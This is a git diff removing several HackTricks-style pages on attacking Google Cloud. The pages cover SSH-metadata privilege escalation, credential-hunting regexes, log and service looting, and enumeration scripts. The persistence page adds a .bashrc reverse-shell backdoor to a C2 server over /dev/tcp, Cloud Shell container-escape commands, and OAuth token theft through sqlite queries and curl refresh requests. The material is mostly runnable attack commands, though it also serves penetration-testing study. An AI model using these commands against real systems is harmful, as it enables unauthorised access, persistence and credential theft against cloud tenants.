We'll **generate a new key** for ourselves like this: - -```bash -ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub -``` - -Add your new public key to the file `meta.txt` imitating the format: - -``` -alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice -bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob -alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuMrv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsvEVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlPuxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWCxQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice -``` - -Now, you can **re-write the SSH key metadata** for your instance with the following command: - -```bash -gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt -``` - -You can now **access a shell in the context of `alice`** as follows: - -``` -lowpriv@instance:~$ ssh -i ./key alice@localhost -alice@instance:~$ sudo id -uid=0(root) gid=0(root) groups=0(root) -``` - -## **Create a new privileged user and add a SSH key** - -No existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target? 
- -You can **follow the same process** as above, but just **make up a new username**. This user will be created automatically and given rights to `sudo`. Scripted, the process would look like this: - -```bash -# define the new account username -NEWUSER="definitelynotahacker" - -# create a key -ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" - -# create the input meta file -NEWKEY="$(cat ./key.pub)" -echo "$NEWUSER:$NEWKEY" > ./meta.txt - -# update the instance metadata -gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt - -# ssh to the new account -ssh -i ./key "$NEWUSER"@localhost -``` - -## **Grant sudo to existing session** - -This one is so easy, quick, and dirty that it feels wrong… - -``` -gcloud compute ssh [INSTANCE NAME] -``` - -This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods. - -## SSH keys at project level - -Following the details mentioned in the previous section you can try to compromise more VMs. - -We can expand upon those a bit by [**applying SSH keys at the project level**](https://cloud.google.com/compute/docs/instances/adding-removing-ssh-keys#project-wide), granting you permission to **SSH into a privileged account** for any instance that has not explicitly chosen the "Block project-wide SSH keys" option.: - -``` -gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt -``` - -If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes. - -# **Using OS Login** - -[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. 
- -OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`. - -OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`. - -The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level: - -* **compute.instances.osLogin** (no sudo) -* **compute.instances.osAdminLogin** (has sudo) - -Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted. - -If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above. - -Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network. - -# Search for Keys in the filesystem - -It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this. - -First, find what `gcloud` config directories exist in users' home folders. 
- -``` -sudo find / -name "gcloud" -``` - -You can manually inspect the files inside, but these are generally the ones with the secrets: - -* \~/.config/gcloud/credentials.db -* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/adc.json -* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/.boto -* \~/.credentials.json - -Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you. - -## More API Keys regexes - -```bash -TARGET_DIR="/path/to/whatever" - -# Service account keys -grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \ - "$TARGET_DIR" - -# Legacy GCP creds -grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \ - "$TARGET_DIR" - -# Google API keys -grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \ - "$TARGET_DIR" - -# Google OAuth tokens -grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \ - "$TARGET_DIR" - -# Generic SSH keys -grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \ - "$TARGET_DIR" - -# Signed storage URLs -grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \ - "$TARGET_DIR" - -# Signed policy documents in HTML -grep -Pzr '(?s)
' \ - "$TARGET_DIR" -``` - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-looting.md b/cloud-security/gcp-security/gcp-looting.md deleted file mode 100644 index 118849f0b..000000000 --- a/cloud-security/gcp-security/gcp-looting.md +++ /dev/null @@ -1,158 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Stackdriver logging - -[Stackdriver](https://cloud.google.com/stackdriver/) is Google's general-purpose infrastructure logging suite which might be capturing sensitive information like syslog-like capabilities that report individual commands run inside Compute Instances, HTTP requests sent to load balancers or App Engine applications, network packet metadata for VPC communications, and more. - -The service account for a Compute Instance **only needs WRITE** access to enable logging on instance actions, **but** an administrator may **mistakenly** **grant** the service account both **READ** and WRITE access. If this is the case, you can explore logs for sensitive data. - -[gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) provides tools to get this done. First, you'll want to see what types of logs are available in your current project. - -```bash -# List logs -gcloud logging logs list -NAME -projects/REDACTED/logs/OSConfigAgent -projects/REDACTED/logs/cloudaudit.googleapis.com%2Factivity -projects/REDACTED/logs/cloudaudit.googleapis.com%2Fsystem_event -projects/REDACTED/logs/bash.history -projects/REDACTED/logs/compute.googleapis.com -projects/REDACTED/logs/compute.googleapis.com%2Factivity_log - -# Read logs -gcloud logging read [FOLDER] - -# Write logs -# An attacker writing logs may confuse the Blue Team -gcloud logging write [FOLDER] [MESSAGE] -``` - -# AI platform configurations - -Google [AI Platform](https://cloud.google.com/ai-platform/) is another "serverless" offering for machine learning projects. - -There are a few areas here you can look for interesting information - models and jobs. Try the following commands. - -``` -$ gcloud ai-platform models list --format=json -$ gcloud ai-platform jobs list --format=json -``` - -# Cloud pub/sub - -Google [Cloud Pub/Sub](https://cloud.google.com/pubsub/) is a service that allows independent applications to **send messages** back and forth. 
Basically, there are **topics** where applications may **subscribe** to send and receive **messages** (which are composed of the message content and some metadata). - -```bash -# Get a list of topics in the project -gcloud pubsub topics list - -# Get a list of subscriptions across all topics -gcloud pubsub subscriptions list --format=json - -# This will retrieve a non-ACKed message (and won't ACK it) -gcloud pubsub subscriptions pull [SUBSCRIPTION NAME] -``` - -However, you may have better results [asking for a larger set of data](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing. - -# Cloud Git repositories - -Google's [Cloud Source Repositories](https://cloud.google.com/source-repositories/) are Git repositories designed to be private storage for source code. You might **find useful secrets here**, or use the **source to discover vulnerabilities** in other applications. - -You can explore the available repositories with the following commands: - -```bash -# enumerate what's available -gcloud source repos list - -# clone a repo locally -gcloud source repos clone [REPO NAME] -``` - -# Cloud Filestore Instances - -Google [Cloud Filestore](https://cloud.google.com/filestore/) is NAS for Compute Instances and Kubernetes Engine instances. You can think of this like any other **shared document repository -** a potential source of sensitive info. - -If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist. 
- -``` -gcloud filestore instances list --format=json -``` - -# Containers - -```bash -gcloud container images list -gcloud container subnets list -gcloud container clusters list -gcloud container clusters get-credentials [NAME] - -# Run a container locally -docker run --rm -ti gcr.io//secret:v1 sh -``` - -# Kubernetes - -First, you can check to see if any Kubernetes clusters exist in your project. - -``` -gcloud container clusters list -``` - -If you do have a cluster, you can have `gcloud` automatically configure your `~/.kube/config` file. This file is used to authenticate you when you use [kubectl](https://kubernetes.io/docs/reference/kubectl/overview/), the native CLI for interacting with K8s clusters. Try this command. - -``` -gcloud container clusters get-credentials [CLUSTER NAME] --region [REGION] -``` - -Then, take a look at the `~/.kube/config` file to see the generated credentials. This file will be used to automatically refresh access tokens based on the same identity that your active `gcloud` session is using. This of course requires the correct permissions in place. - -Once this is set up, you can try the following command to get the cluster configuration. - -``` -kubectl cluster-info -``` - -You can read more about `gcloud` for containers [here](https://cloud.google.com/sdk/gcloud/reference/container/). - -This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum) - -# References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-network-enumeration.md b/cloud-security/gcp-security/gcp-network-enumeration.md deleted file mode 100644 index 8706f21d4..000000000 --- a/cloud-security/gcp-security/gcp-network-enumeration.md +++ /dev/null @@ -1,57 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Network Enumeration - -## Compute - -```bash -# List networks -gcloud compute networks list -gcloud compute networks describe - -# List subnetworks -gcloud compute networks subnets list -gcloud compute networks subnets get-iam-policy --region -gcloud compute networks subnets describe --region - -# List FW rules in networks -gcloud compute firewall-rules list -``` - -You easily find compute instances with open firewall rules with [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_firewall\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_firewall\_enum) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-persistance.md b/cloud-security/gcp-security/gcp-persistance.md deleted file mode 100644 index ef90744cc..000000000 --- a/cloud-security/gcp-security/gcp-persistance.md +++ /dev/null @@ -1,141 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -These are useful techniques once, somehow, you have compromised some GCP credentials or machine running in a GCP environment. - -# OS Patching -If you gain access to a service account (either through credentials or by a default service account on a compute instance/cloud function) that has the `osconfig.patchDeployments.create` permission, you can create a [patch deployment](https://cloud.google.com/compute/docs/os-patch-management#patch_deployment_overview). This deployment will run a script on Windows and Linux compute instances at a defined interval under the context of the [OS Config agent](https://cloud.google.com/compute/docs/os-patch-management#how_os_patch_management_works). - -Automated tooling such as [patchy]( https://github.com/rek7/patchy) exists to detect and exploit the presence of lax permissions on a compute instance or cloud function. - -If you want to manually install the patch deployment run the following gcloud command, a patch boilerplate can be found [here](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json): - -`gcloud compute os-config patch-deployments create my-update --file=patch.json` - -# Google’s Cloud Shell - -## Persistent Backdoor - -[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. - -You can access Google's Cloud Shell from the **web console** or by running **`gcloud cloud-shell ssh`**. - -This console has some interesting capabilities for attackers: - -1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance. -2. Said instance will **maintain its home directory for at least 120 days** if no activity happens. -3. There are **no capabilities for an organisation to monitor** the activity of that instance. 
- -This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120 days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing: - -```bash -echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc -``` - -## Container Escape - -Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing: - -```bash -sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest -sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest -sudo docker -H unix:///google/host/var/run/docker.sock start escaper -sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh -``` - -This is not considered a vulnerability by Google, but it gives you a wider vision of what is happening in that env. 
- -Moreover, notice that from the host you can find a service account token: - -```bash -wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/" -default/ -vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/ -``` - -With the following scopes: - -```bash -wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes" -https://www.googleapis.com/auth/logging.write -https://www.googleapis.com/auth/monitoring.write -``` - -# Token Hijacking - -## Authenticated User - -If you manage to access the home folder of an **authenticated user in GCP**, by **default**, you will be able to **get tokens for that user as long as you want** without needing to authenticate and independently of the machine you use his tokens from and even if the user has MFA configured. - -This is because by default you **will be able to use the refresh token as long** as you want to generate new tokens. 
- -To get the current token of a user you can run: - -```bash -sqlite3 ./.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='';" -``` - -To get the details to generate a new access token run: - -```bash -sqlite3 ./.config/gcloud/credentials.db "select value from credentials where account_id='';" -``` - -To get a new refreshed access token with the refresh token, client ID, and client secret run: - -```bash -curl -s --data client_id= --data client_secret= --data grant_type=refresh_token --data refresh_token= --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token -``` - -## Service Accounts - -Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\ -However, if you steal the **OAuth token** of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the **victim deletes the private API key, the OAuth token will still be valid until it expires**. - -## Metadata - -Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine contacting the metadata endpoint** (note that the Oauth tokens you can access in this endpoint are usually restricted by scopes). 
- -## Remediations - -Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2) - -# References - -* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec) -* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1) -* [https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md b/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md deleted file mode 100644 index 7cd15b400..000000000 --- a/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md +++ /dev/null @@ -1,191 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Cloud Functions - -Google [Cloud Functions](https://cloud.google.com/functions/) allow you to host code that is executed when an event is triggered, without the requirement to manage a host operating system. These functions can also store environment variables to be used by the code. - -```bash -# List functions -gcloud functions list - -# Get function config including env variables -gcloud functions describe [FUNCTION NAME] - -# Get logs of previous runs -# By default, limits to 10 lines -gcloud functions logs read [FUNCTION NAME] --limit [NUMBER] -``` - -## Enumerate Open Cloud Functions - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_functions.sh) you can find Cloud Functions that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Functions that permit unauthenticated invocations -# anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API") - - if [ -z "$enabled" ]; then - continue - fi - - - for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do - # drop substring from first occurence of "," to end of string. - func="${func_region%%,*}" - # drop substring from start of string up to last occurence of "," - region="${func_region##*,}" - ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")" - - all_users="$(echo "$ACL" | grep allUsers)" - all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $func" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] 
Open to all authenticated users: $proj: $func" - fi - done -done - -``` - -# App Engine Configurations - -Google [App Engine](https://cloud.google.com/appengine/) is another ["serverless"](https://about.gitlab.com/topics/serverless/) offering for hosting applications, with a focus on scalability. As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an `app.yaml` file which can be accessed as follows: - -```bash -# First, get a list of all available versions of all services -gcloud app versions list - -# Then, get the specific details on a given app -gcloud app describe [APP] -``` - -# Cloud Run Configurations - -Google [Cloud Run](https://cloud.google.com/run) is another serverless offering where you can search for env variables also. Cloud Run creates a small web server, running on port 8080, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response. - -The access to this web server might be public or managed via IAM permissions: - -```bash -# First get a list of services across the available platforms -gcloud run services list --platform=managed -gcloud run services list --platform=gke - -# To learn more, export as JSON and investigate what the services do -gcloud run services list --platform=managed --format=json -gcloud run services list --platform=gke --format=json - -# Attempt to trigger a job unauthenticated -curl [URL] - -# Attempt to trigger a job with your current gcloud authorization -curl -H \ - "Authorization: Bearer $(gcloud auth print-identity-token)" \ - [URL] -``` - -## Enumerate Open CloudRun - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations. 
- -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Run services that permit unauthenticated -# invocations anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API") - - if [ -z "$enabled" ]; then - continue - fi - - - for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do - ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $run" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $run" - fi - done -done - -``` - -# References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - - -
